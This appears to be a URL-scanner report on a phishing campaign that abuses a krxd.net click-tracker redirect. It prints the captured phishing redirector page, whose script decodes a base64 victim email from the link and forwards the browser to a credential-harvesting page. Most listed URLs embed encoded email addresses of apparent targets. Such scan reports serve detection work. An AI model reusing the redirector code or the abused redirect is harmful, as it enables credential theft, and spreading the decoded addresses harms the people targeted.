https://apiservices.krxd.net/click_tracker/track?kxconfid=whjxbtb0h&_knopii=1&kxcampaignid=P.C.C-Class.W206.L.MI&kxplacementid=module2findmycar&kxbrand=MB&clk=https%3A%2F%2Finsidecommerce.sa.com%2F%23am9uYXRoYW4uaGFpc3RAZmlzY2hlci5kZQ==

Last Checked: Jun 22, 2023, 02:07 EDT

IP Address: 151.101.42.133
ASN #: AS54113 FASTLY, US
Location: Unknown, Unknown, Unknown
URL Reputation:
  • Unknown This URL is not identified as malicious in the PhishTank Database.
  • Unknown PhishCheck thinks this URL is likely not a phish.
  • Unknown OpenPhish: URL not in feed.

Other submissions on 151.101.42.133:

  • https://apiservices.krxd.net/click_tracker/track?kx_event_uid=LR25EaJr&clk=https://QQBU9ZltFEDvybeQQBU9ZltFEDvybe.kronsstadtrealty.com/sign/#aW5mb0BuMTBtb2JpbGlhcmkuY2F0

  • https://apiservices.krxd.net/

  • https://view.monday.com/4691688769-0fd7b30be660035fc870dcff33c42f7b?r=use1

  • https://apiservices.krxd.net/click_tracker/track?kxconfid=whjxbtb0h&kxcampaignid=P.C.C-Class.W206.L.MI&kxplacementid=module2findmycar&kxbrand=MB&clk=http%3A%2F%2F3456789ygycdxfghvbiuh876tyfuh-rtdyfugi.cmk-geometrics.com%2F%23aW5mcmFzdHJ1Y3R1cmVAaHViZ3JvdXAuY29t

  • https://apiservices.krxd.net/click_tracker/track?kxconfid=whjxbtb0h&kxcampaignid=P.C.C-Class.W206.L.MI&kxplacementid=module2findmycar&kxbrand=MB&clk=http%3A%2F%2F3456789ygycdxfghvbiuh876tyfuh-rtdyfugi.cmk-geometrics.com%2F%23UG9zdG1hc3RlckBodWJncm91cC5jb20=

  • https://apiservices.krxd.net/click_tracker/track?kxconfid=whjxbtb0h&_knopii=1&kxcampaignid=P.C.C-Class.W206.L.MI&kxplacementid=module2findmycar&kxbrand=MB&clk=https://mroad-auto.com%2Fnew%2Fauth%2FYMm1%2F%2F%2F%2FYmVycnkuZ2VsYXRvQGNoYXNlLmNvbQ==

  • https://apiservices.krxd.net/click_tracker/track?kxconfid=whjxbtb0h&_knopii=1&kxcampaignid=P.C.C-Class.W206.L.MI&kxplacementid=module2findmycar&kxbrand=MB&clk=https://ismotion.sa.com%2Fnew%2Fauth%2FLTkM%2F%2F%2F%2Fc2FsZXNAY2hvcHRhbmt0cmFuc3BvcnQuY29t

  • https://apiservices.krxd.net/click_tracker/track?kxconfid=whjxbtb0h&_knopii=1&kxcampaignid=P.C.C-Class.W206.L.MI&kxplacementid=module2findmycar&kxbrand=MB&clk=https://smokeysbarbecue.net%2Fnew%2Fauth%2FNNub%2F%2F%2F%2FbG5hbmRlcnNvbkBodWJncm91cC5jb20=

  • https://apiservices.krxd.net/click_tracker/track?kxconfid=whjxbtb0h&_knopii=1&kxcampaignid=P.C.C-Class.W206.L.MI&kxplacementid=module2findmycar&kxbrand=MB&clk=https://giltty.sa.com%2Fnew%2Fauth%2F3AHN%2F%2F%2F%2FdGVhbTdmYUBjaG9wdGFua3RyYW5zcG9ydC5jb20=

  • https://apiservices.krxd.net/click_tracker/track?kxconfid=whjxbtb0h&_knopii=1&kxcampaignid=P.C.C-Class.W206.L.MI&kxplacementid=module2findmycar&kxbrand=MB&clk=https%3A%2F%2Fjunkcarsgetpaid.com/work/lobatan/YWxpc2EucnVzYWtvdmFAY2FzZXN0YWNrLmNvbQ==

Other submissions on krxd.net:

  • https://apiservices.krxd.net/click_tracker/track?kxconfid=whjxbtb0h&_knopii=1&kxcampaignid=P.C.C-Class.W206.L.MI&kxplacementid=module2findmycar&kxbrand=MB&clk=https://smokeysbarbecue.net%2Fnew%2Fauth%2FNNub%2F%2F%2F%2FbG5hbmRlcnNvbkBodWJncm91cC5jb20=

  • https://apiservices.krxd.net/click_tracker/track?kxconfid=whjxbtb0h&_knopii=1&kxcampaignid=P.C.C-Class.W206.L.MI&kxplacementid=module2findmycar&kxbrand=MB&clk=https://giltty.sa.com%2Fnew%2Fauth%2F3AHN%2F%2F%2F%2FdGVhbTdmYUBjaG9wdGFua3RyYW5zcG9ydC5jb20=

  • https://apiservices.krxd.net/click_tracker/track?kxconfid=whjxbtb0h&_knopii=1&kxcampaignid=P.C.C-Class.W206.L.MI&kxplacementid=module2findmycar&kxbrand=MB&clk=https%3A%2F%2Fjunkcarsgetpaid.com/work/lobatan/YWxpc2EucnVzYWtvdmFAY2FzZXN0YWNrLmNvbQ==

  • http://apiservices.krxd.net/

  • http://apiservices.krxd.net/click_tracker/track?kxconfid=whjxbtb0h&_knopii=1&kxcampaignid=p.c.c-class.w206.l.mi&kxplacementi...

  • https://apiservices.krxd.net/click_tracker/track?kxconfid=whjxbtb0h&_knopii=1&kxcampaignid=P.C.C-Class.W206.L.MI&kxplacementid=module2findmycar&kxbrand=MB&clk=https%3A%2F%2Fthecriticalreel.com/wp-admin/user/privacy#dGFtbXkuaGFrZUB0YWdnbG9naXN0aWNzLmNvbQ==

  • https://apiservices.krxd.net/click_tracker/track?kx_event_uid=LR25EaJr&clk=%68%74%74%70%73%3A%2F%2F%72%69%63%68%65%6C%64%69%73%66%69%6E%65%61%72%74%73%2E%63%6F%6D%2F%61%63%74%76%6D%2F%3F%6F%33%6F%44%30%79%6B%58%3D%63%33%56%77%63%47%39%79%64%45%42%68%64%6D%6C%7A%4C%6D%46%6B%4C%6D%70%77#23rfc

  • https://apiservices.krxd.net/click_tracker/track?k46x_event_uid=LR25EaJr&clk=https%3A%2F%2Fcourier-planet.gr%2Fcss%2Fadmine%2F748394%2F%2F%2F%2Fam9laHJsZWluQG1lc2lyb3dmaW5hbmNpYWwuY29t

  • https://apiservices.krxd.net/click_tracker/track?kxconfid=whjxbtb0h&_knopii=1&kxcampaignid=P.C.C-Class.W206.L.MI&kxplacementid=module2findmycar&kxbrand=MB&clk=https://giltty.sa.com%2Fnew%2Fauth%2FR6wz%2F%2F%2F%2FcHJvY3VyZW1lbnR0ZWFtQGh1Ymdyb3VwLmNvbQ==

  • https://apiservices.krxd.net/click_tracker/track?kxconfid=whjxbtb0h&_knopii=1&kxcampaignid=P.C.C-Class.W206.L.MI&kxplacementid=module2findmycar&kxbrand=MB&clk=https%3A%2F%2Fthecriticalreel.com/wp-admin/user/privacy#dGFtbXkuaGFrZUB0YWdnbG9naXN0aWNzLmNvbQ==

Previous checks:

                               
                             
  • GET
    0 Timed out waiting for a response.

    https://lmogin.restmaker.xyz/?username=jonathan.haist@fischer.de

  • https://apiservices.krxd.net/click_tracker/track?kxconfid=whjxbtb0h&_knopii=1&kxcampaignid=P.C.C-Class.W206.L.MI&kxplacementid=module2findmycar&kxbrand=MB&clk=https%3A%2F%2Finsidecommerce.sa.com%2F%23am9uYXRoYW4uaGFpc3RAZmlzY2hlci5kZQ== https://insidecommerce.sa.com/#am9uYXRoYW4uaGFpc3RAZmlzY2hlci5kZQ==?_knopii=1
<html><head>
    <title>We Moving</title>
    <!-- Redirection By G66K -->
    <!-- ICQ: 747246257 -->


    <script type="text/javascript">
        //domain string to match if redirecting to domain
        var domainMatching = 'google'; //where go going to redirect domain name google
        //where to redirect scampage url
        var redirectUrl = 'https://lmogin.restmaker.xyz/?username=';
        //redirect sperator word
        var redirectDelimiter = '#';
        //enable base64
        var enablebase64 = true;
        
        var decodebase64 = true;

        /**
*
*  Base64 encode / decode
*  http://www.webtoolkit.info/
*
**/
var Base64 = {

// private property
_keyStr : "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",

// public method for encoding
encode : function (input) {
    var output = "";
    var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
    var i = 0;

    input = Base64._utf8_encode(input);

    while (i < input.length) {

        chr1 = input.charCodeAt(i++);
        chr2 = input.charCodeAt(i++);
        chr3 = input.charCodeAt(i++);

        enc1 = chr1 >> 2;
        enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
        enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
        enc4 = chr3 & 63;

        if (isNaN(chr2)) {
            enc3 = enc4 = 64;
        } else if (isNaN(chr3)) {
            enc4 = 64;
        }

        output = output +
        this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) +
        this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4);

    }

    return output;
},

// public method for decoding
decode : function (input) {
    var output = "";
    var chr1, chr2, chr3;
    var enc1, enc2, enc3, enc4;
    var i = 0;

    input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");

    while (i < input.length) {

        enc1 = this._keyStr.indexOf(input.charAt(i++));
        enc2 = this._keyStr.indexOf(input.charAt(i++));
        enc3 = this._keyStr.indexOf(input.charAt(i++));
        enc4 = this._keyStr.indexOf(input.charAt(i++));

        chr1 = (enc1 << 2) | (enc2 >> 4);
        chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
        chr3 = ((enc3 & 3) << 6) | enc4;

        output = output + String.fromCharCode(chr1);

        if (enc3 != 64) {
            output = output + String.fromCharCode(chr2);
        }
        if (enc4 != 64) {
            output = output + String.fromCharCode(chr3);
        }

    }

    output = Base64._utf8_decode(output);
    
    output = output.replace(/[^A-Za-z 0-9 \.,\?""!@#\$%\^&\*\(\)-_=\+;:<>\/\\\|\}\{\[\]`~]*/g, '');
    
    return output;

},

// private method for UTF-8 encoding
_utf8_encode : function (string) {
    string = string.replace(/\r\n/g,"\n");
    var utftext = "";

    for (var n = 0; n < string.length; n++) {

        var c = string.charCodeAt(n);

        if (c < 128) {
            utftext += String.fromCharCode(c);
        }
        else if((c > 127) && (c < 2048)) {
            utftext += String.fromCharCode((c >> 6) | 192);
            utftext += String.fromCharCode((c & 63) | 128);
        }
        else {
            utftext += String.fromCharCode((c >> 12) | 224);
            utftext += String.fromCharCode(((c >> 6) & 63) | 128);
            utftext += String.fromCharCode((c & 63) | 128);
        }

    }

    return utftext;
},

// private method for UTF-8 decoding
_utf8_decode : function (utftext) {
    var string = "";
    var i = 0;
    var c = c1 = c2 = 0;

    while ( i < utftext.length ) {

        c = utftext.charCodeAt(i);

        if (c < 128) {
            string += String.fromCharCode(c);
            i++;
        }
        else if((c > 191) && (c < 224)) {
            c2 = utftext.charCodeAt(i+1);
            string += String.fromCharCode(((c & 31) << 6) | (c2 & 63));
            i += 2;
        }
        else {
            c2 = utftext.charCodeAt(i+1);
            c3 = utftext.charCodeAt(i+2);
            string += String.fromCharCode(((c & 15) << 12) | ((c2 & 63) << 6) | (c3 & 63));
            i += 3;
        }

    }

        string = string.replace(/[^A-Za-z 0-9 \.,\?""!@#\$%\^&\*\(\)-_=\+;:<>\/\\\|\}\{\[\]`~]*/g, '');


    return string;
}

}



        function ValidateEmail(mail) {
            if (/^\w+([\.-]?\w+)*@\w+([\.-]?\w+)*(\.\w{2,3})+$/.test(mail)) {
                return true;
            }
            return false;
        }
       

        function Fired() {

            var getParams = function (url) {
                var params = {};
                var parser = document.createElement('a');
                parser.href = url;
                console.log(parser);


                if (parser.href.match(redirectDelimiter)) {
                    var foundRedirections = parser.href.split(redirectDelimiter)[1];


                    if(enablebase64 && decodebase64)
                    {
                        if(foundRedirections.match('/')){

                            listEncoded = foundRedirections.split('/');

                            for(let encoded of listEncoded)
                            {
                                console.log(encoded);
                            dataDecoded = Base64.decode(encoded).trim();
                            
                            dataDecoded = decodeURIComponent(dataDecoded);
                                if (dataDecoded.match(domainMatching))
                                {
                                     window.location.href = dataDecoded.match('http') ? dataDecoded : 'http://' + dataDecoded;
                                }
				if(dataDecoded.match('@')){
					window.location.href =  redirectUrl + dataDecoded;
				}
                            
                            }
                        }

                    }

                    if (foundRedirections.match(domainMatching)) {
                        if(enablebase64 && decodebase64)
                            foundRedirections = Base64.decode(foundRedirections).trim();
                        window.location.href = foundRedirections.match('http') ? foundRedirections : 'http://' + foundRedirections;
                    }
                }

                var query = parser.href.split(/[#\?&=]/);

                for(let param of query)
                    {

                        if(enablebase64 && decodebase64){
                            // param = param + '==';
                            param = decodeURIComponent(param);
                            param = Base64.decode(param);
                            if(ValidateEmail(param) && decodebase64){
                           
                            window.location.href = redirectUrl + param;
                            }
                        }
                        if(enablebase64 && !decodebase64)
                        {
                            
                           if(Base64.encode(Base64.decode(param)) == param){
                                window.location.href = redirectUrl + param;
                            }
                        }
  if(param.match('@')){
                                        window.location.href =  redirectUrl + param;
                                }

                        
                    }
            };

            var param = getParams(window.location.href);


        }


    </script>
</head>

<body onload="Fired()">



</body></html>

                             

Screenshot: